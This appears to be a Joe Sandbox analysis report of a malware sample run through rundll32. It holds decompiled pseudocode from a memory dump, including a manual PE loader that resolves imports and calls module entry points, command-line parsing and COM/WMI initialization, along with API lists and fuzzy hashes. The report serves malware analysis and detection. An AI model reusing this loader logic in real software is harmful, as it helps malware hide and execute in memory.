            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: a3fc6619d4e47bb9cef55c05d7d773f03437e9b5510119e21d5cefe05d171da8
            • Instruction ID: b2391082117d51299a615a6eb1d7d73ea91e57da75bde83f6ae772d7f007b1de
            • Opcode Fuzzy Hash: a3fc6619d4e47bb9cef55c05d7d773f03437e9b5510119e21d5cefe05d171da8
            • Instruction Fuzzy Hash: ABE180B1A00209BFEF119F65CC41EBF7B69EF05349F10441AFD179A241E671E9618BA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445503F Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E0445503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x446f8d4; // 0x450fc00
					_t3 = _t94 + 0x110; // 0x45116d0
					_t96 =  *0x446f8d8; // 0x450fab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
				}
				if(E0445CB85(_t156) != 0) {
					L4:
					_t47 = E0445C85A();
					_push(_t99);
					_v588 = _t47;
					E0445C64D(_t47,  &_v580, _t173, _t175);
					_t100 = E04454FFB( &_v580,  &_v580, _t173);
					_t112 = E0445E34A( &_v580, E0445A5D0( &_v580), 0);
					E0445C870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E04453174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x446c9d8);
						_t55 = E04459C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E04459AB3(_v596);
							_t116 = _t101;
							 *0x446f990 = _t56;
							 *0x446f988 = E04459AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E0445A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x446ca26);
							_t146 = 0xe;
							E0445AC36(_t146, _t175);
							E0445AC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E0445AC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E0445B1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E0445B1B1(_t149, _t175);
							}
							_t65 = E0445A1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E0445ABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x446f8d4; // 0x450fc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E04460DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x446f8d4; // 0x450fc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E0445F15B(_t152);
									}
									E0445565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x446f8d4; // 0x450fc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E0445109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E04458D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x450fe28
								_t127 = _t32;
								L20:
								_t67 = E044558D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x446f8d4; // 0x450fc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E0445D210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x446f8d0; // 0x450f8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x446f8d0; // 0x450f8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E04458DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E04458DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E0445308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































            0x0445503f
            0x0445504c
            0x04455057
            0x0445505c
            0x0445505e
            0x04455061
            0x04455066
            0x04455069
            0x04455073
            0x04455075
            0x0445507a
            0x04455082
            0x0445508b
            0x0445508b
            0x04455098
            0x044550b3
            0x044550b5
            0x044550ba
            0x044550bf
            0x044550c5
            0x044550d4
            0x044550f3
            0x044550f5
            0x044550fa
            0x04455101
            0x04455106
            0x0445510d
            0x04455117
            0x04455119
            0x0445511a
            0x04455120
            0x04455125
            0x04455128
            0x0445512a
            0x0445512f
            0x04455196
            0x0445519b
            0x0445519d
            0x044551a7
            0x044551ac
            0x044551ac
            0x044551c6
            0x044551c8
            0x044551cb
            0x044551cd
            0x00000000
            0x00000000
            0x044551d3
            0x044551da
            0x044551dd
            0x044551e6
            0x044551eb
            0x044551f1
            0x044551f6
            0x044551fb
            0x044551ff
            0x04455201
            0x04455205
            0x04455205
            0x0445520a
            0x0445520d
            0x0445520f
            0x04455213
            0x04455213
            0x0445521a
            0x0445521f
            0x04455223
            0x04455226
            0x0445522b
            0x04455231
            0x04455232
            0x0445525a
            0x04455260
            0x04455267
            0x04455276
            0x0445527b
            0x00000000
            0x0445527b
            0x04455269
            0x00000000
            0x04455234
            0x04455234
            0x04455239
            0x04455240
            0x04455285
            0x04455285
            0x0445528c
            0x04455290
            0x04455291
            0x04455291
            0x0445529b
            0x044552a0
            0x044552a3
            0x044552a4
            0x044552a6
            0x044552a8
            0x044552ad
            0x044552b4
            0x044552f7
            0x044552b6
            0x044552bb
            0x044552c3
            0x044552c7
            0x044552d2
            0x044552dd
            0x044552e5
            0x044552e9
            0x044552f1
            0x044552f1
            0x044552b4
            0x044552fd
            0x04455300
            0x04455302
            0x04455308
            0x04455308
            0x0445530a
            0x0445530a
            0x00000000
            0x0445530a
            0x04455242
            0x04455242
            0x04455248
            0x0445524a
            0x0445524f
            0x0445524f
            0x04455251
            0x04455280
            0x00000000
            0x04455280
            0x04455253
            0x04455111
            0x04455111
            0x00000000
            0x04455111
            0x04455232
            0x04455135
            0x04455143
            0x04455156
            0x0445515b
            0x04455161
            0x04455163
            0x0445517b
            0x04455180
            0x04455189
            0x0445518f
            0x00000000
            0x0445518f
            0x0445516b
            0x04455174
            0x00000000
            0x04455174
            0x0445510f
            0x00000000
            0x0445509a
            0x044550a5
            0x044550ab
            0x044550ad
            0x0445530c
            0x0445530c
            0x0445530e
            0x04455314
            0x04455314
            0x00000000
            0x044550ad

            APIs
            • memset.MSVCRT ref: 04455061
            • lstrcpyW.KERNEL32 ref: 044552C7
            • lstrcatW.KERNEL32(00000000,?), ref: 044552E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 044552E9
            • lstrcatW.KERNEL32(00000000,0446CA28), ref: 044552F1
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 8a46a34c7f85cad44c808313e760e1b95bb0587b5eb1464624c6291b0b9b7037
            • Instruction ID: 196a3e70f9bd83151d93960ae673d15f76333d21287deaead059ac55ebfaf1de
            • Opcode Fuzzy Hash: 8a46a34c7f85cad44c808313e760e1b95bb0587b5eb1464624c6291b0b9b7037
            • Instruction Fuzzy Hash: 0A71CF71704300ABEF14EB25E884B7B73E9EB84714F14052FF8459B2A6EF74B8088B52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445DEAB Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0445DEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x446c9d8);
						_t36 = E04459C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E04458DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















            0x0445deb4
            0x0445debb
            0x0445debe
            0x0445decb
            0x0445ded1
            0x0445ded4
            0x0445ded6
            0x0445dedb
            0x0445dfb3
            0x0445dfb3
            0x0445dfb3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445dee1
            0x0445dee1
            0x0445dee1
            0x0445dee4
            0x0445deea
            0x0445df06
            0x0445df0d
            0x0445df13
            0x0445df17
            0x0445df2b
            0x0445df2b
            0x0445df2e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445df19
            0x0445df19
            0x0445df1e
            0x0445df22
            0x0445df22
            0x0445df26
            0x0445df27
            0x00000000
            0x0445df19
            0x0445df2f
            0x0445df2f
            0x0445df32
            0x0445df33
            0x0445df3a
            0x0445df44
            0x00000000
            0x00000000
            0x0445df46
            0x0445df4c
            0x0445df50
            0x0445dfa9
            0x0445df59
            0x0445df66
            0x0445df6c
            0x0445df6e
            0x0445df75
            0x0445df7b
            0x0445df83
            0x0445df8b
            0x0445df97
            0x0445df9d
            0x00000000
            0x0445dfaf
            0x0445df3c
            0x00000000

            APIs
            • GetCommandLineW.KERNEL32 ref: 0445DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0445DECB
            • lstrlenW.KERNEL32 ref: 0445DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0445DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0445DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0445DFA9
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 1aa826ea696741df9d3bd191016ed6d7b3597fdd23943a99a05fd41a72b10f28
            • Instruction ID: 9d30fb934fc57239e67d913461b834c5a68479ef8c614bc2a2594076d4e03807
            • Opcode Fuzzy Hash: 1aa826ea696741df9d3bd191016ed6d7b3597fdd23943a99a05fd41a72b10f28
            • Instruction Fuzzy Hash: 8E31C7F2D00115FBEF24AF55DC88AAEB7B9EF45315F10815BEC05E3261DB70A9818B51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445E6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0445E6ED
            • SysAllocString.OLEAUT32(?), ref: 0445E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0445E709
            • SysFreeString.OLEAUT32(?), ref: 0445E784
            • SysFreeString.OLEAUT32(?), ref: 0445E787
            • SysFreeString.OLEAUT32(?), ref: 0445E78C
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 7a65b3976ddae259b7aea533feb0021e3a01e3c8ae8e522b1ab99bdada602479
            • Instruction ID: e136a69505e2a60991380a0fcd700d4c6af31dadd728a9093c082ef0502e4577
            • Opcode Fuzzy Hash: 7a65b3976ddae259b7aea533feb0021e3a01e3c8ae8e522b1ab99bdada602479
            • Instruction Fuzzy Hash: 3D21FDB5A00218FFDF00DFA5CC88DAFBBBDEF48654B20449AF505A7251DA71AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04463DC7 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
            Download Yara Rule
            C-Code - Quality: 20%
            			E04463DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































            0x04463dd0
            0x04463ddd
            0x04463de3
            0x04463dec
            0x04463def
            0x04463df2
            0x00000000
            0x04463ee3
            0x04463ee7
            0x04463ee9
            0x04463ef7
            0x04464015
            0x04464019
            0x044640de
            0x044640e7
            0x044640ea
            0x044640ee
            0x044640f4
            0x044640fc
            0x044640fc
            0x04464104
            0x04464112
            0x04464115
            0x04464119
            0x0446411f
            0x0446412f
            0x0446415a
            0x00000000
            0x0446415c
            0x04464135
            0x04464146
            0x00000000
            0x04464154
            0x04464158
            0x00000000
            0x04464154
            0x04464148
            0x0446414c
            0x04464151
            0x00000000
            0x04464151
            0x04464137
            0x0446413b
            0x0446413d
            0x00000000
            0x0446413d
            0x04464121
            0x04464125
            0x00000000
            0x04464127
            0x0446401f
            0x04464023
            0x04464025
            0x04464033
            0x00000000
            0x00000000
            0x04464039
            0x04464042
            0x04464050
            0x0446405c
            0x04464068
            0x04464071
            0x04464074
            0x04464078
            0x0446407a
            0x04464087
            0x0446409b
            0x044640aa
            0x044640bb
            0x04464084
            0x00000000
            0x04464084
            0x044640bd
            0x044640c1
            0x044640c6
            0x00000000
            0x044640c6
            0x044640d1
            0x00000000
            0x00000000
            0x044640d3
            0x044640d7
            0x00000000
            0x044640d9
            0x04463efd
            0x04463f06
            0x04463f14
            0x04463f17
            0x04463f34
            0x04463f3b
            0x04463f4d
            0x04463f4d
            0x04463f54
            0x04463f64
            0x04463f7c
            0x04463f66
            0x04463f6e
            0x04463f6e
            0x04463f7f
            0x04463f83
            0x04463f93
            0x04463fb6
            0x04463fc8
            0x04463f95
            0x04463fa9
            0x04463fa9
            0x04463fd2
            0x04463fee
            0x04463fd4
            0x04463fe3
            0x04463fe3
            0x04463ff6
            0x04463fff
            0x04463fff
            0x0446400d
            0x00000000
            0x04463f56
            0x04463f58
            0x00000000
            0x04463f58
            0x04463f54
            0x00000000
            0x04463f17
            0x04463dfa
            0x04463e08
            0x04463e0d
            0x04463e18
            0x04463e1b
            0x04463e1f
            0x04463e21
            0x04463e31
            0x04463e3a
            0x04463e43
            0x04463e4b
            0x04463e54
            0x04463e5f
            0x04463e65
            0x04463e68
            0x04463e6b
            0x04463e72
            0x04463e79
            0x00000000
            0x00000000
            0x04463e84
            0x04463e92
            0x04463e9d
            0x04463ea7
            0x04463ebf
            0x04463ecc
            0x04463ecc
            0x04463ea9
            0x04463eb4
            0x04463eb4
            0x04463ed3
            0x04463ed3
            0x04463edb
            0x04463edb
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 04463F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 04463F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 04463FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 04463FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 044640B3
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: 9ef4ca4ccfb598c2370e440a6953979c825fb973104e7974568f2c4005143921
            • Instruction ID: a4739d2ead622457ec072e929716cb1164bebdf4e50ee256fbe8df010404d717
            • Opcode Fuzzy Hash: 9ef4ca4ccfb598c2370e440a6953979c825fb973104e7974568f2c4005143921
            • Instruction Fuzzy Hash: 17E19075A00219DFDF24CFA8C884AAEBBF1FF08315F14855AE816AB351D734A981CF65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04461A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 261b9a98062580924a474e1559bfd83f6ecafb1f7f3306ca941535267a6c08ca
            • Instruction ID: ff65bdfa7ec5d6114b550429d8edf9f26f3f19f98133496b48868302d844308e
            • Opcode Fuzzy Hash: 261b9a98062580924a474e1559bfd83f6ecafb1f7f3306ca941535267a6c08ca
            • Instruction Fuzzy Hash: D641D47170020AA7EF248DA89D99ABF366CDF40B15F280217FD03D6340F6A4F9919A93
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445E485 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E0445E485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x446c8a0, 0, 1, 0x446c8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E04458DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













            0x0445e492
            0x0445e495
            0x0445e498
            0x0445e4a9
            0x0445e4af
            0x0445e4c0
            0x0445e4c8
            0x0445e519
            0x0445e519
            0x0445e51e
            0x0445e523
            0x0445e523
            0x0445e526
            0x0445e52b
            0x0445e530
            0x0445e530
            0x0445e533
            0x0445e4ca
            0x0445e4cb
            0x0445e4d1
            0x0445e4e2
            0x0445e4e7
            0x00000000
            0x0445e4e9
            0x0445e4f6
            0x0445e4fe
            0x00000000
            0x0445e500
            0x0445e502
            0x0445e50a
            0x00000000
            0x0445e50c
            0x0445e50f
            0x0445e515
            0x0445e515
            0x0445e50a
            0x0445e4fe
            0x0445e4e7
            0x0445e538

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4A9
            • CoCreateInstance.OLE32(0446C8A0,00000000,00000001,0446C8B0,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0445E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4F6
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
